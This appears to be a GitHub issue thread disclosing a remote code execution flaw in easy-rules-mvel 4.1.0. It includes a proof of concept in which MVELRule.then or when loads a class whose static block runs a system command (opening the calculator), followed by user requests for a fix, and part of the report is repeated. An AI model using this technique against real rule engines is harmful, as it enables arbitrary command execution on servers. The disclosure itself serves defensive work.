Open sirnple opened 7 months ago
easy-rules-mvel version: 4.1.0
I have run code like:
try { MVELRule mVELRule = new MVELRule(); MVELRule result = mVELRule.then("jaz.Zer"); } catch (Exception e) { }
Meanwhile I hava class jaz.Zer in classpath, which content is:
jaz.Zer
import java.io.IOException; public class Zer { static { try { Runtime.getRuntime().exec("calc"); } catch (IOException e) { throw new RuntimeException(e); } } }
On Windows platform, above code will open my PC's calculator
Additional: MVELRule.when also leads to this RCE
MVELRule.when
try { MVELRule mVELRule = new MVELRule(); MVELRule result = mVELRule.when("\bjaz.Zer"); } catch (Exception e) { }
It's a limitation of mvel expression language.
Hi! Do you have an update on this, is there a workaround or fix for this? I see the vulnerability is still open.
Do we have any workaround to fix the vulnerability ?
easy-rules-mvel version: 4.1.0
I have run code like:
Meanwhile I hava class
jaz.Zer
in classpath, which content is:On Windows platform, above code will open my PC's calculator
Additional:
MVELRule.when
also leads to this RCE